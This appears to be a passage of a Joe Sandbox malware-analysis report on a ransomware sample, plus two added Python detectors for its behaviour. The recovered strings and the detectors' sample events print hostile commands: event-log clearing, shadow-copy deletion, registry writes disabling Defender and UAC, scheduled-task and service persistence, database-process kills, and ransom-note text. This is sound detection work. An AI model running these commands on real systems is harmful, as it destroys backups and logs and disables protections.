"%SystemDrive%\Users\%username%\AppData\"&S-2153.bat$kaj3n$l$rem$rem a5m6f$schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f$slow$w#G!$w#G!
                                          • API String ID: 969238624-4175406912
                                          • Opcode ID: ccf03af2e6e6268ec2764d5bf26d935981bd0e3d9dc78a84fd9adbd32f3197a9
                                          • Instruction ID: 97b2ed7df03a6182794ae6a531a7187b68a7475dd74193e40d912f967d5c2564
                                          • Opcode Fuzzy Hash: ccf03af2e6e6268ec2764d5bf26d935981bd0e3d9dc78a84fd9adbd32f3197a9
                                          • Instruction Fuzzy Hash: D5F28970D10258CEDB25DF64CE55BEEBBB4AF95304F0042D9E10967292EBB4AB88CF51
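The string tables of the three functions above recover the sample's whole pre-encryption command chain: the `wevtutil.exe el` / `wevtutil.exe cl` loop that wipes every event log, `vssadmin.exe Delete Shadows /All /Quiet`, the `reg.exe` writes that set `DisableAntiSpyware` to 1 and `EnableLUA` to 0, `sc create SqlBakup binPath= "...\AppData\SysMain.sys" start= auto`, the `schtasks /create ... /tn "Microsoft_Auto_Scheduler" /tr "'...\AppData\S-2153.bat'"` watchdog, and the `taskkill /im` run against SQL Server and Oracle processes. The detector below is an added example written for this page; it is not code from Joe Sandbox or from the sample, and the rule names, the `SAMPLE_EVENTS` process-creation records and the ATT&CK technique mapping are all my own constructions. The sample events carry backslashes in the Defender policy path even though the recovered string shows them stripped; the rule keys on the value name and data, not on the path separators, so both spellings match.

```python
import re
from collections import Counter

# Constructed Sysmon-style process-creation events (not taken from the sandbox
# report); the command lines mirror the strings recovered from the sample.
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c for /F "tokens=*" %1 in (\'wevtutil.exe el\') DO wevtutil.exe cl "%1"'},
    {"pid": 1002, "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": 'wevtutil.exe cl "Security"'},
    {"pid": 1003, "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": 'wevtutil.exe cl "System"'},
    {"pid": 1004, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": 'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'},
    {"pid": 1005, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"pid": 1006, "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 1007, "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc create SqlBakup binPath= "C:\Users\user\AppData\SysMain.sys" start= auto'},
    {"pid": 1008, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "\'C:\\Users\\user\\AppData\\S-2153.bat\'" /f'},
    {"pid": 1009, "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /im sqlservr.exe"},
    {"pid": 1010, "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /im oracle.exe"},
    {"pid": 1011, "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /im sqlwriter.exe"},
    {"pid": 1012, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe readme.txt"},
]

# (rule name, ATT&CK technique, pattern over the command line). Rule names are
# hypothetical; the technique IDs are the standard ATT&CK identifiers.
RULES = [
    ("clear_event_logs", "T1070.001",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("delete_shadow_copies", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("disable_defender_policy", "T1562.001",
     re.compile(r"\breg(\.exe)?\s+add\b.*DisableAntiSpyware.*/d\s+\"?1\"?", re.I)),
    ("disable_uac", "T1548.002",
     re.compile(r"\breg(\.exe)?\s+add\b.*\bEnableLUA\b.*/d\s+\"?0\"?", re.I)),
    ("service_from_appdata", "T1543.003",
     re.compile(r'\bsc(\.exe)?\s+create\b.*binPath=\s*"?[^"]*\\AppData\\', re.I)),
    ("scheduled_bat_from_appdata", "T1053.005",
     re.compile(r"\bschtasks(\.exe)?\s+/create\b.*/tr\b.*\\AppData\\[^\"']*\.bat", re.I)),
    ("kill_db_process", "T1489",
     re.compile(r"\btaskkill(\.exe)?\s+/im\s+(sqlservr|sqlagent|sqlbrowser|sqlwriter|msftesql"
                r"|oracle|ocssd|dbsnmp|agntsvc|synctime)\.exe", re.I)),
]


def match_rules(cmdline):
    """Return [(rule_name, technique)] for every rule whose pattern hits cmdline."""
    return [(name, technique) for name, technique, pat in RULES if pat.search(cmdline)]


def assess(events):
    """Aggregate rule hits over a batch of process events and grade the chain.

    The verdict is 'ransomware_chain' only when an impact rule (shadow deletion or
    database kill), a defence-evasion rule and a persistence rule all fire; a single
    vssadmin call or a lone reg write is graded lower so that admin activity does not
    trip the high-severity verdict on its own.
    """
    hits = Counter()
    techniques = set()
    for ev in events:
        for name, technique in match_rules(ev["cmdline"]):
            hits[name] += 1
            techniques.add(technique)
    distinct = set(hits)
    impact = {"delete_shadow_copies", "kill_db_process"} & distinct
    evasion = {"clear_event_logs", "disable_defender_policy", "disable_uac"} & distinct
    persistence = {"service_from_appdata", "scheduled_bat_from_appdata"} & distinct
    if impact and evasion and persistence:
        verdict = "ransomware_chain"
    elif len(distinct) >= 2:
        verdict = "suspicious"
    elif distinct:
        verdict = "low"
    else:
        verdict = "clean"
    return {"hits": dict(hits), "techniques": sorted(techniques), "verdict": verdict}


if __name__ == "__main__":
    result = assess(SAMPLE_EVENTS)
    for name, count in sorted(result["hits"].items()):
        print(f"{name:28s} {count}")
    print("techniques:", ", ".join(result["techniques"]))
    print("verdict:", result["verdict"])
```

The `wevtutil cl` rule fires three times on the constructed batch (once on the parent `cmd.exe /c for ...` line and once per spawned child), which is the shape an EDR sees when the `for /F` loop runs: one parent command line followed by a burst of `wevtutil.exe cl "<log>"` children, so counting hits per rule rather than deduplicating them keeps that burst visible.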

                                          Control-flow Graph

                                          control_flow_graph: function at 9dd08f (basic blocks 9dd08f-9de5a2, graph node IDs 5178-5754). The rendered graph survived only as a flattened edge list and is not reproduced here; the callees it names include a659c6 (the MoveFileExW wrapper listed under APIs below) and a405bb.
                                          APIs
                                            • Part of subcall function 009BB040: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009BB0E7
                                            • Part of subcall function 009BAE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009BAE81
                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 009DD89E
                                            • Part of subcall function 00A659C6: MoveFileExW.KERNEL32(?,?,00000002), ref: 00A659D3
                                            • Part of subcall function 00A659C6: GetLastError.KERNEL32 ref: 00A659DD
                                            • Part of subcall function 00A659C6: __dosmaperr.LIBCMT ref: 00A659E4
                                          Strings
                                          • </span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 009DD91F
                                          • \AppData\N-Save.sys, xrefs: 009DD622
                                          • Z0, xrefs: 009DD1D1
                                          • If You Want To Restore Them Email Us : , xrefs: 009DDA80
                                          • u4g8, xrefs: 009DD541
                                          • U, xrefs: 009DD6E8
                                          • All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without , xrefs: 009DDA6D
                                          • .PBF, xrefs: 009DD4E5, 009DD4F2, 009DDC42
                                          • alfons, xrefs: 009DD609
                                          • Telegram , ID :, xrefs: 009DD893
                                          • c, xrefs: 009DDB8F
                                          • Second Email :, xrefs: 009DD869
                                          • taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk, xrefs: 009DDA49
                                          • Dflt, xrefs: 009DDB9D
                                          • </span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The , xrefs: 009DD985
                                          • h2gq, xrefs: 009DD57E
                                          • p2h6, xrefs: 009DD3B9, 009DD481
                                          • <html><head><title>, xrefs: 009DD8A8
                                          • If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 009DDAB2
                                          • </title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou, xrefs: 009DD8BB
                                          • n7t0, xrefs: 009DD3A6, 009DD46E
                                          • INW15, xrefs: 009DD8D4, 009DDA68, 009DDBDE
                                          • _Mail-, xrefs: 009DDBF7
                                          • file, xrefs: 009DDB98
                                          • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1", xrefs: 009DE4A4
                                          • <span class="spnn">, xrefs: 009DD953
                                          • </span></br></br>If You Want To Restore Them Email Us : <span class="spnn">, xrefs: 009DD8ED
                                          • c, xrefs: 009DDD09
                                          • To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp, xrefs: 009DDB1C
                                          • :\Users\, xrefs: 009DD5ED
                                          • reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic, xrefs: 009DDA1B
                                          • _[ID-, xrefs: 009DDBC6
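The command lines above (the taskkill chain against database services, the reg.exe policy changes that disable Defender and UAC, the vssadmin shadow deletion, and the wevtutil loop that clears every event log) are the parts of this sample a detection engineer acts on first. The following Python is an added example, not part of the Joe Sandbox report or of the sample, that scores process-creation events against those strings. The event record layout (ProcessId, Image, CommandLine), the three-process threshold for calling a taskkill run a chain, and the rule names are assumptions; the sample events are constructed from the report's strings, cut where the report's strings are cut, and the first reg.exe key path is kept exactly as the report lists it (no backslashes), which is why that rule keys on the value name rather than on the key path.

```python
"""Score Windows process-creation events against the defense-evasion command
lines this sample embeds (added example; event format and threshold assumed)."""
import re
from typing import Dict, Iterable, List, Set

# Database/backup processes named in the sample's taskkill chain (report strings).
DB_PROCESSES = {"msftesql", "sqlagent", "sqlbrowser", "sqlservr", "sqlwriter",
                "oracle", "ocssd", "dbsnmp", "synctime", "agntsvc"}
# Captures the image name after "/im", e.g. "sqlservr" from "taskkill /im sqlservr.exe".
TASKKILL_RE = re.compile(r'taskkill(?:\.exe)?\s+(?:/f\s+)?/im\s+([\w-]+)', re.I)

# [^&]* keeps each match inside one "&"-separated segment of a chained command.
RULES = {
    "shadow_copy_deletion": re.compile(r'vssadmin(?:\.exe)?\s+delete\s+shadows\b', re.I),
    "event_log_clearing": re.compile(r'wevtutil(?:\.exe)?\s+cl\b', re.I),
    "defender_disable_policy": re.compile(
        r'reg(?:\.exe)?\s+add\b[^&]*windows\s*defender[^&]*DisableAntiSpyware[^&]*/d\s+"?1"?', re.I),
    "uac_disable_policy": re.compile(
        r'reg(?:\.exe)?\s+add\b[^&]*\\System\b[^&]*EnableLUA[^&]*/d\s+"?0"?', re.I),
}
DB_KILL_THRESHOLD = 3  # assumption: three distinct DB processes in one line is a chain


def classify(cmdline: str) -> Set[str]:
    """Return the names of every rule the command line triggers."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    killed = {m.group(1).lower() for m in TASKKILL_RE.finditer(cmdline)}
    if len(killed & DB_PROCESSES) >= DB_KILL_THRESHOLD:
        hits.add("database_service_kill_chain")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per event that triggers at least one rule."""
    findings = []
    for ev in events:
        hits = classify(ev.get("CommandLine", ""))
        if hits:
            findings.append({"pid": ev.get("ProcessId"), "image": ev.get("Image"),
                             "rules": sorted(hits)})
    return findings


# Constructed events: the first three are built from the report's strings, the
# last two are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": "4012", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet'},
    {"ProcessId": "4020", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe"},
    {"ProcessId": "4031", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'''cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"'''},
    {"ProcessId": "5100", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
    {"ProcessId": "5108", "Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /im notepad.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["pid"], f["image"], ", ".join(f["rules"]))
```

The rules deliberately match on the whole chained line rather than on the parent image, because the sample runs these through a single cmd.exe invocation joined with "&"; a rule that only inspects vssadmin.exe or wevtutil.exe as a separate process would still fire on the children, but the parent line is where all four behaviours appear together and where the triage priority is obvious.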
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_$ErrorFileLastMoveSimpleString::operator=__dosmaperr
                                          • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$.PBF$:\Users\$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$INW15$Second Email :$Telegram , ID :$U$\AppData\N-Save.sys$_Mail-$_[ID-$user$c$c$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$u4g8$Z0
                                          • API String ID: 4082941153-3611061756
                                          • Opcode ID: b0f5fd596d27f961935796709de5821ad2803ba40e105c55d0c4b5e5893d583c
                                          • Instruction ID: 98b0b2cbdbcf9649c1e74496d0f1e2174c345dc2ad154f91f609ad9b7a2fefd0
                                          • Opcode Fuzzy Hash: b0f5fd596d27f961935796709de5821ad2803ba40e105c55d0c4b5e5893d583c
                                          • Instruction Fuzzy Hash: 56727F70D051989EDB15E760DD52BEDB7B8AF61304F4484E8A44A63293EF706F88CF62
                                          APIs
                                          • GetWindowTextLengthA.USER32(?), ref: 009C5327
                                          • GetWindowTextA.USER32(?,00000000,00000001), ref: 009C53F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: TextWindow$Length
                                          • String ID: !$P$asykat$asykat$k2ba8v$r1d8la$w#G!
                                          • API String ID: 1006428111-663365838
                                          • Opcode ID: 0a9182d3efff5e4631077362ea0be1286a23775a1c9f4d7b9eb7bd4ae2846bdd
                                          • Instruction ID: 75c50ceb0bef0c8b068eac9e18a3292458806daa3331a11343904e59e4b0f248
                                          • Opcode Fuzzy Hash: 0a9182d3efff5e4631077362ea0be1286a23775a1c9f4d7b9eb7bd4ae2846bdd
                                          • Instruction Fuzzy Hash: D0A2CF70E102589FEB24DF68CD94FDEBBB5AF85304F10829DE409A7291DB74AA84CF51


                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,21472377,00AD9528,?,00000000), ref: 00A14275
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00A8C5D8,000000FF,?,00A14970), ref: 00A1427B
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 00A1428F
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 00A142A0
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00A8C5D8,000000FF), ref: 00A142C5
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A142F4
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00A14342
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AcquireContextCrypt$ErrorLast$Exception@8Throw___std_exception_copy
                                          • String ID: CryptAcquireContext$Crypto++ RNG$w#G!
                                          • API String ID: 636621833-3832095453
                                          • Opcode ID: 91f2c1ad14c32109d077e6dcb7ac54e98919fb26362f4a18c0515a4a3ebf34b0
                                          • Instruction ID: 2d77c883f4d7f96b90f910cec05268bbdd7b0e705cb53345cf129a687463dec0
                                          • Opcode Fuzzy Hash: 91f2c1ad14c32109d077e6dcb7ac54e98919fb26362f4a18c0515a4a3ebf34b0
                                          • Instruction Fuzzy Hash: D0415172A44709ABDB10DF99DC41F9AB7FCFF48710F10462AF515A7680EBB5A9048B60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $1234567891234567$@$U12H6AN==$_Enc$_[ID-$nqpso5938fh71jfu$w#G!
                                          • API String ID: 0-1974628941
                                          • Opcode ID: 252fe6758678752d731f79c6eedbb612727a36692129036a46b5df3c1046f459
                                          • Instruction ID: 2b5c52896fda03f92a13b118caaad8402f728d12974a618747c861b5aaca95fb
                                          • Opcode Fuzzy Hash: 252fe6758678752d731f79c6eedbb612727a36692129036a46b5df3c1046f459
                                          • Instruction Fuzzy Hash: 0E13BD70E00258CFDB28DB64CD95BDDB7B9AF86304F10829DE049A7292DB749E84CF56
                                          APIs
                                          • PathIsNetworkPathA.SHLWAPI(?,00AAAABC,?,?,?,21472377), ref: 009C59A7
                                          • __alloca_probe_16.LIBCMT ref: 009C59D7
                                          • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,21472377), ref: 009C59F1
                                          • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,21472377), ref: 009C5A0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Path$ByteCharDiskFreeMultiNetworkSpaceWide__alloca_probe_16
                                          • String ID: w#G!
                                          • API String ID: 592574438-519468572
                                          • Opcode ID: d3f4931718aae67055ec0b7c5b91a8dea2fc0aa356a4d50ae968bcc5fa26966e
                                          • Instruction ID: eea0fd752c8c0a0f789d56a9f10bf89015e4b25c9484d42376aa222061e9b0de
                                          • Opcode Fuzzy Hash: d3f4931718aae67055ec0b7c5b91a8dea2fc0aa356a4d50ae968bcc5fa26966e
                                          • Instruction Fuzzy Hash: 6751BD71A00609DFDB18CFA9C980FAEB7B9FF44310F55826DE81297291EB31AD85CB51
                                          APIs
                                          • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,21472377), ref: 009C4565
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4606
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: BufferFree$EnumUser
                                          • String ID: Default$w#G!
                                          • API String ID: 2592758740-3442755388
                                          • Opcode ID: 036441669494c8205af89ef94dac3834087d7ce12cef60a9d0a731c58c06a486
                                          • Instruction ID: dbd0489ee3ef693cd0dbea7655e72c16055a92bed6981db4562cfc3ff8bd9808
                                          • Opcode Fuzzy Hash: 036441669494c8205af89ef94dac3834087d7ce12cef60a9d0a731c58c06a486
                                          • Instruction Fuzzy Hash: 6E416075E002599BDB14CF98C994FEEB7F8EB59710F10462EE812B3290DB35AE04CB95
                                          APIs
                                          • CryptGenRandom.ADVAPI32(00000000,?,00000000,00000001), ref: 00A14980
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A1499F
                                            • Part of subcall function 00A14390: GetLastError.KERNEL32(00000010,21472377,7508FC30,?), ref: 00A143E0
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A14A0A
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
                                          • String ID: CryptGenRandom$w#G!
                                          • API String ID: 1600773198-1156935335
                                          • Opcode ID: 0799607601b4859c0187e1cbc7af57370789473ab93cce31167ffd4efcc3e8c8
                                          • Instruction ID: 56947ae4dceb8e80cec61c1ca1bd3b8fd6aabe5469f370700e61f0ade24544ae
                                          • Opcode Fuzzy Hash: 0799607601b4859c0187e1cbc7af57370789473ab93cce31167ffd4efcc3e8c8
                                          • Instruction Fuzzy Hash: CD318171A00248AFDF10DFA4D945BEEBBB8FF09714F140169E911AB281DB746A49CB61
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 009C3733
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID: user$user$w#G!
                                          • API String ID: 2645101109-2410236406
                                          • Opcode ID: 3a54b5375d5eaabf12792e5d1e6bcb55743a8e6531740d161d9a3fe07a2697ab
                                          • Instruction ID: b1fdef38d75cf859a4f864da9f3d09ca7cd0adfdc954749a6cd50d46b114172c
